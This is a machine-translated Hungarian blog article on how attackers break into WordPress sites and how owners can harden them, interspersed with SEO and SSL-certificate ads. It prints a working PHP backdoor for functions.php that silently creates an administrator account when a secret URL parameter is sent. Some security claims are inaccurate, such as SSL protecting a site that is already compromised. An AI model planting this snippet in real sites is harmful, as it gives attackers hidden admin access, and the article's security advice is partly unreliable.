Intro
Mielőtt elkezdenénk ezt a cikket, szeretnénk, ha tudná, hogy a hackelés illegális, és mi nem ösztönözzük vagy bátorítjuk a rosszindulatú tevékenységeket. Ez a cikk kiz árólag arra szolgál, hogy ismereteket szerezzünk arról, hogyan működnek a csalók, és hogy a webhely biztonságának változatos módszerei elengedhetetlenek ahhoz, hogy távol tartsuk őket. Beszéljük meg!
- Hogyan hackelik meg a csalók a WordPress-t?
- Hogyan védd meg WP oldaladat a csalóktól?
Szóval, minden további nélkül kezdjük a témát.
Hogyan Hack WordPress weboldal Online?
(Forrás: wpsecurityninja.com)
A WPScan használata:
AWPScan egy WP biztonsági szkenner, amely segít a webhelytulajdonosoknak ellenőrizni a WordPress webhelyük sebezhetőségét, de ezt a szkennert a hackerek is használják a webhelyek feltörésére irányuló indítékaik teljesítéséhez.
A WPScan lehetővé teszi a webhelyek tulajdonosai és rendszergazdái számára, hogy megadják a WP felhasználói fiókokat és a nyers erővel használt jelszavakat, és a WP fiókokhoz való jogosulatlan hozzáférés megszerzésének első lépése.
(Brute force felhasználónév és jelszó a WPScan segítségével. Forrás: Medium)
MIM-támadások:
A Man-in-middle (MIM) támadások könnyen végrehajthatók hasonló LAN-okat használó felhasználók esetében. A nem titkosított felhasználói bejelentkezések könnyű célpontot jelentenek, mivel minden részlet látható egyszerű szövegben.
Az ilyen típusú támadások végrehajtásában részt vevő szoftverek képesek kiszúrni a kompromittált témákat, bővítményeket, és képesek a felhasználók felsorolására.
(Forrás: Medium)
SQL Injections:
Az SQL-injekciós támadások a legjelentősebb támadások, amelyeket a weboldalakba való behatoláshoz használnak. Ezek a támadások a weboldal backend átjáróit célozzák, és lehetővé teszik a hackerek számára, hogy a kompromittált parancsok végrehajtásával behatoljanak ezekbe.
(Forrás: secure.wphackedhelp.com)
Az All-in-One platform a hatékony SEO-hoz
Minden sikeres vállalkozás mögött egy erős SEO kampány áll. De a számtalan optimalizálási eszköz és technika közül lehet választani, ezért nehéz lehet tudni, hol kezdjük. Nos, ne félj tovább, mert van egy ötletem, ami segíthet. Bemutatom a Ranktracker all-in-one platformot a hatékony SEO-ért.
Végre megnyitottuk a Ranktracker regisztrációt teljesen ingyenesen!
Ingyenes fiók létrehozásaVagy Jelentkezzen be a hitelesítő adatokkal
Ezek a behatolások lehetővé teszik a hackerek számára az adatbázisok és parancsok módosítását, valamint a webhelyinformációk törlését vagy ellopását is.
Mivel ezek az SQL-támadások kiszúrják a sebezhető és javítatlan oldalakat, megkönnyítik és sikeressé teszik a hackerfeladatot.
A My SQL/cPanel használata:
Ennél a módszernél a hackerek egy hamis fiókot hoznak létre, vagy módosítják a WP oldal jelenlegi felhasználójának jelszavát. A hackerek a cPanelen keresztül próbálnak behatolni a PhpMyAdmin megnyitásával. A _users végződésű táblázatot keresik, és megtalálják a felhasználót, akit módosítani szeretnének.
Ez lehetővé teszi számukra, hogy megváltoztassák annak a felhasználónak a hitelesítő adatait, akit meg akarnak hackelni. Lenyomozzák a felhasználót, és megváltoztatják a felhasználó jelszavát (a user_pass mezőből) az online MD5-generátor megnyitásával, és kicserélik azt a kívánt jelszóra, majd később a # gombra kattintanak.
(A felhasználónevek, a felhasználók kódolt jelszavai, e-mail azonosítóik stb. mind a wp_users adatbázis táblában vannak tárolva. Forrás: firstsiteguide.com)
A felhasználónevek, a felhasználók kódolt jelszavai, e-mail azonosítóik stb. mind a wp_users adatbázis táblában vannak tárolva.
Functions.php szerkesztése:
A hackerek a Functions.php fájl módosításához is hozzáférnek a cPanelhez. A Fájlkezelő feloldásával megkeresik az aktív téma mappáját. A public_html/wp_content/themes mappából követik a témát, és a functions.php-t szerkesztik a kompromittált kódjuk elhelyezésével. A hackelés már folyamatban van, mert a hackerek új fiókot hoztak létre. Ha ezzel végeztek, törlik a kompromittált kódot.
Új felhasználói fiók létrehozása FTP-n keresztül:
Általában az FTP-fiókok segítenek a webhelytulajdonosoknak létrehozni egy olyan könyvtárat a webhelyükön belül, amely lehetővé teszi, hogy bizonyos felhasználók a bejelentkezési adataikkal feltöltsék/letöltsék a fájljaikat.
Ezek a fájlok az interneten is megtekinthetők.
FTP-fiók létrehozása a webhelyen:
- Adja meg a kívánt adatokat
- Adja meg az új FTP-felhasználó felhasználónevét
- Adja meg a jelszót az FTP-n keresztül történő hozzáféréshez szükséges fiók kiosztásához.
- Adja meg a könyvtár nevét az FTP-n keresztül történő hozzáféréshez.
- Írja be a kívánt MB helyet, amelyet a mappának kíván adni.
- Később nyomja meg a "Create" gombot az új fiók létrehozásához.
Az FTP-n keresztül történő hozzáféréshez az új felhasználónak be kell töltenie az alábbi adatokat.
Cím / Host Name / Address: yourdomain.com vagy ftp.yourdomain.com Felhasználó / User: user@yourdomain.com Jelszó: Az FTP-fiókhoz rendelt jelszó.
Port: 21Nevezze meg a fájlok feltöltésére/letöltésére szolgáló mappát.
Az új felhasználónak olvasási és írási jogosultságai lesznek mind a kiválasztott könyvtárban, mind az abban található összes alkönyvtárban. Például, ha létrehozza az ügyfél felhasználót, és hozzáférést ad neki a / home / user / public_html könyvtárhoz.
Behatolás a hátsó ajtón keresztül:
A webhelyre való behatolás rosszindulatú módja a hátsó ajtón keresztül történik. Legyen szó akár egy csalóról, aki be akar férni a webhelyére, akár az áldozat felhasználóról, aki vissza akarja szerezni a hozzáférést a webhelyéhez a backdoor behatoláson kereszt ül, mindkettőjüknek követniük kell az alábbi lépéseket.
Az All-in-One platform a hatékony SEO-hoz
Minden sikeres vállalkozás mögött egy erős SEO kampány áll. De a számtalan optimalizálási eszköz és technika közül lehet választani, ezért nehéz lehet tudni, hol kezdjük. Nos, ne félj tovább, mert van egy ötletem, ami segíthet. Bemutatom a Ranktracker all-in-one platformot a hatékony SEO-ért.
Végre megnyitottuk a Ranktracker regisztrációt teljesen ingyenesen!
Ingyenes fiók létrehozásaVagy Jelentkezzen be a hitelesítő adatokkal
Azokban az esetekben, amikor egy új felhasználói fiókot hoznak létre FTP-n keresztül, vagy jelszó-visszaállítás történik, de ez nem adja meg a kívánt eredményt, a felhasználó hátsó ajtón keresztül akarja feltörni a webhelyét, és visszaszerezni az adminisztrátori hozzáférését.
Lépések a Backdoor létrehozásához:
- Nyissa meg a functions.php fájlt, és illessze be az alábbi kódot.
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
- Később mentse el a változtatásokat.
Crypto Jacking & Cryptocurrency Mining:
A kriptovaluták népszerűsége olyan új kiberfenyegetéseknek adott teret, mint a kriptodézsma, amelyet kriptovaluta-bányászati kártevőnek is neveznek.
A számítógépnek a felhasználó akarata és tudatossága ellenére történő elkobzását kriptodézsmának nevezik. A crypto-jacking malware esetében a csalók a rendszereket és hálózatokat veszélyeztető szoftveren keresztül szállított rosszindulatú malware-rel fertőzik meg a felhasználó számítógépét.
Adathalászat:
Az adathalászat olyan módszer, amelynek során a csalók a felhasználók érzékeny adatait (bejelentkezési adatok, szociális számlaszám, PIN-kód, hitelkártyaadatok stb.) úgy csalják ki, hogy jogi személynek adják ki magukat. Céljuk eléréséhez általában e-maileket használnak.
Példa: Az adathalász e-mailben rossz linket is elhelyezhet, és a felhasználókat valamilyen csalárd webhelyre irányíthatja, ahová rosszindulatú szoftvereket juttathat el.
Malware:
AWordPress biztonsági statisztikák szerint 4000 WP weboldal fertőződött meg rosszindulatú szoftverektől a hamis SEO pluginek miatt.
A csalóknak nincs szükségük forrásra a rosszindulatú programok terjesztéséhez. A SEO pluginek, a WP témák és sok más, az oldalon jelenlévő tényező motiválta a hackereket, hogy a közelmúltban megjelent WP-VCD malware-t használják.
Még az adathalász e-mailek is átjárók a rosszindulatú programok terjesztéséhez.
A hackerek mottója itt is ugyanaz, azaz a felhasználók érzékeny adatainak megszerzése a rendszerekbe való behatolással és az információk ellopásával.
WordPress Ransomware:
A WP ransomware esetében a hackerek rosszindulatú szoftverekkel blokkolják a felhasználók hozzáférését a rendszerekhez és hálózatokhoz. Ugyanezt a felhasználó a hacker által követelt váltságdíj megfizetésével tudja visszaállítani.
Példa: A Petya-támadás, amelynek során a hacker titkosítja a fájlokat és adatokat, és váltságdíjat követel a visszafejtő kulcs ellenében.
Cross-Site Scripting (XSS) támadás:
Az XSS-támadásokat a hackerek úgy hajtják végre, hogy rosszindulatú tartalmat juttatnak be a weboldalba, kihasználva ezzel a böngészőt. Ez a támadás lehetővé teszi a hacker számára, hogy adatokat lopjon a cookie-kból, módosítsa a webhely tartalmát, és elfoglalja a webhelyet érzékeny adatok megszerzése céljából.
Kattintáslopás:
A clickjacking során a hacker rosszindulatú kísérletet tesz egy gomb/link kompromittálására, és arra ösztönzi a felhasználót, hogy kattintson a kompromittált objektumra. Ez lehetővé teszi a hacker számára, hogy rosszindulatú parancsokat hajtson végre a felhasználó számára érzékeny adatokhoz való hozzáférés érdekében.
Spoofing:
A hamisítás olyan támadás, amelyben a személy megbízható személyazonosságnak álcázza magát, hogy illegális előnyökhöz jusson a felhasználóval szemben, és rávegye őt bizalmas információinak megadására.
Mindezen hackertámadások megelőzése érdekében speciális biztonsági intézkedéseket kell hozni a WP weboldalának védelme érdekében.
Hogyan védjük meg a WordPress weboldalt a hackertől?
(Forrás: envisagedigital.co.uk)
A fenti statisztikák elégségesek ahhoz, hogy jelezzék a WordPress népszerűségét. Ez a népszerűség teszi ezt a CMS-platformot kívánatosabbá a hackerek körében, akik változatos hackelési módszerekkel próbálkoznak, hogy hozzáférjenek a WP-weboldalakhoz és azok adataihoz.
Ezért fontos tudni, hogyan lehet megakadályozni, hogy a hackerek hozzáférjenek a WP webhelyéhez.
Biztosítsa WP webhelyét SSL-tanúsítvánnyal:
Amikor bármilyen adat betöltődik a webhelyre, az mindig egyszerű szövegben van, ami mindenki számára könnyen látható, beleértve a hackereket is. Ez kockázatos lehet, mivel a hackerek visszaélhetnek a webhely adataival.
Az SSL (Secure Socket Layers) tanúsítványok azok a digitális tanúsítványok, amelyek segítenek a WP webhelyének 256 bites titkosítási biztonsággal történő védelmében, így a webhely adatait kódolt formátumba alakítják át.
A hackerek nem tudják elolvasni a kódokat, noha hozzáférést szereztek az Ön webhelyéhez, és ezért kénytelenek elhagyni az ilyen webhelyeket.
(Forrás: clickssl.net)
Válassza ki a kívánt márkájú SSL tanúsítványt (Comodo, Thawte, RapidSSL, stb.) és telepítse azt a WP oldalára. Az SSL-tanúsítvány típusa esetén meg kell értenie a domaineket és az aldomaineket. Például, ha a WP webhelye aldomainekkel rendelkezik, akkor egyetlen olcsó Wildcard tanúsítvány, amely mindössze 45 $/évbe kerül, körülbelül 45 $/év, biztosíthatja az egész digitális vállalkozását.
Gyors kiállítás, 2048 bites titkosítás, SEO-növelés, webhely-megbízhatósági pecsét, 99%-os böngésző/mobil kompatibilitás, visszatérítési politika és garancia - ez csak néhány a Wildcard SSL tanúsítványok telepítésének jellemzői és előnyei közül.
Az SSL-termékek változatos márkái és lehetőségei, a költségvetés-barát árak és a kiváló ügyfélszolgálat csak néhány előnye annak, hogy a ClickSSL üzletet választja WP webhelyének biztosításához.
Frissítse az alkalmazottakat:
Az emberi hibák katasztrofálisak lehetnek, ezért mindig gondoskodjon arról, hogy alkalmazottai naprakészek legyenek a legújabb kiberfenyegetésekkel kapcsolatban, hogy elkerüljék a sebezhetőségüket.
Ha az Ön munkatársai már a kezdeti szakaszban nyomon tudják követni a feltört webhely gyanús jeleit, tájékoztathatják az érintetteket, és megakadályozhatják, hogy webhelye és vállalkozása további károkat szenvedjen.
Kétfaktoros hitelesítés (2FA) használata:
A 2FA bevezetése az oldalra történő bejelentkezés során a legfontosabb módja a nyers erővel végrehajtott támadások kivédésének. Amellett, hogy egy újabb biztonsági réteget adnak hozzá, a webhely és a felhasználó adatait is védik.
Ennek oka, hogy ha az egyik biztonsági réteg sérül, a csalónak a 2. rétegbe kell behatolnia, hogy hozzáférjen a weboldalhoz.
Ez egy nehéz döntés, és ezért az esetek többségében a csalók végül más, rosszul védett oldalakra térnek át.
Tipp: A WP 2FA egy ingyenes WP bővítmény, amely egy további biztonsági réteget ad a WP webhelyének.
Rendszeresen ellenőrizze a rendszergazdai felhasználókat:
Ez fontos a WP webhely biztonsága szempontjából. Győződjön meg róla, hogy rendszeresen auditálja admin felhasználóit, és ellenőrizze a hozzáféréseiket.
A biztonsági hiányosságok megelőzése érdekében gondoskodjon arról is, hogy a felhasználók és az alkalmazottak a feladataiknak megfelelően korlátozott hozzáféréssel rendelkezzenek.
Rendszeresen frissítse a WordPress magját:
Nem tudsz a WP Core-ról?
Hadd tájékoztassalak röviden, hogy a WP Core tartalmazza az összes alapvető alapfájlt, amely a WP működéséhez szükséges.
A WordPress.org-ról letöltött WP zip fájlban található fájlok listája
(Forrás: ithemes.com)
Ezeket az alapfájlokat rendszeresen frissíteni kell a biztonsági frissítések kiadása után, hogy az összes biztonsági rést befoltozzák.
WP témák és bővítmények letöltése megbízható forrásokból:
Ez kulcsfontosságú, mert a bővítmények fenyegetőek lehetnek, ha nem frissítik őket, vagy nem megbízható forrásból telepítik őket. Ingyenes/fizetett bővítmények használata esetén mindig ellenőrizze az alábbiakban felsorolt tényezőket, mint például:
- Felhasználói értékelések és vélemények
- Felhasználóbarátság
- Kompatibilitás
- Biztonság
- Megbízhatóság
(Forrás: torquemag.io)
Ugyanez a szabály vonatkozik a WP témák telepítésére is.
WP témák és bővítmények rendszeres frissítése:
Az elavult vagy lejárt WP témák és bővítmények mindig veszélyt jelentenek a WP webhelyére, mivel elveszítik a biztonsági szabványokat. Annak érdekében, hogy a hackerek ne használhassák az ilyen átjárókat rosszindulatú programok terjesztésére, hogy hozzáférjenek a webhelyhez, gondoskodjon a WP webhelyén használt témák és bővítmények rendszeres frissítéséről.
Ez segít a plugin megfelelő működésében és a WP legújabb verzióival való szinkronizálásban.
Tipp: A bővítmények oldalon megtekintheti az összes telepített bővítményt, és minden egyes bővítmény mellett egy linket, amely az "Automatikus frissítések engedélyezése" feliratot tartalmazza. Kapcsolja be az automatikus frissítésekhez.
Módosítsa az alapértelmezett adminisztrátornevet:
A hackerek túl okosak, és az alapértelmezett admin név használatával könnyen behatolhatnak a WP oldaladra. Mindig előnyös az alapértelmezett admin felhasználónév módosítása, hogy megakadályozza a hackerek brute-force támadások végrehajtását a webhelyedhez való jogosulatlan hozzáférés megszerzéséhez.
Korlátozott hozzáférés biztosítása:
Soha ne adjon többet a szükségesnél, és ugyanez a szabály vonatkozik a felhasználók és az alkalmazottak webhely-hozzáférésének megadására is.
A hozzáférés-szabályozás a webhely- és adatbiztonság legfontosabb szabálya, mivel ez határozza meg, hogy ki férhet hozzá a webhelyhez és ki nem. A webhely biztonsága érdekében blokkolja a WP admin és más kritikus kódok és adatok összes bejáratát.
A korlátozott hozzáférés nem csak a termelékenységet javítja, hanem a rosszindulatú bejegyzésektől is védi webhelyét.
WordPress frissítés:
Ha a WordPress nincs frissítve, webhelyét a hackerek behatolásának veszélye fenyegeti.
A WordPress a piaci részesedés 37%-át uralja, és rendszeresen frissítéseket ad ki a biztonsági rések és hibák kijavítására. Ezek a frissítések új funkciókat és a meglévők javítását is tartalmazzák, amelyek hasznosak a webhely teljesítményének fokozásához.
Az All-in-One platform a hatékony SEO-hoz
Minden sikeres vállalkozás mögött egy erős SEO kampány áll. De a számtalan optimalizálási eszköz és technika közül lehet választani, ezért nehéz lehet tudni, hol kezdjük. Nos, ne félj tovább, mert van egy ötletem, ami segíthet. Bemutatom a Ranktracker all-in-one platformot a hatékony SEO-ért.
Végre megnyitottuk a Ranktracker regisztrációt teljesen ingyenesen!
Ingyenes fiók létrehozásaVagy Jelentkezzen be a hitelesítő adatokkal
(Forrás: wpbeginner.com)
Tartsa naprakészen WP webhelyét a robusztus biztonság érdekében.
Befejezés:
Használjon erős és összetett jelszavakat, és tartsa WP webhelyét, valamint a bővítményeket és témákat frissítve, hogy kijavítsa az összes biztonsági hiányosságot. Szánjon időt alkalmazottai oktatására, mivel ez mindig segít a katasztrófák megelőzésében.
Soha ne lazítson a biztonságon, és mindig biztosítsa, hogy a legjobb és megbízható biztonsági bővítményeket használja, hogy WP webhelyét biztonságban tartsa a kíváncsi szemektől. Ezen kívül, védje webhelyét SSL-lel, hogy növelje az ügyfelek bizalmát, az üzletet és a SEO-t.
Most, hogy már tisztában vagy azzal, hogyan működnek a hackerek, reméljük, hogy ez a cikk segít abban, hogy megakadályozd a hackerek behatolását a webhelyedre, és biztonságosan kezeld a WP webhelyedet.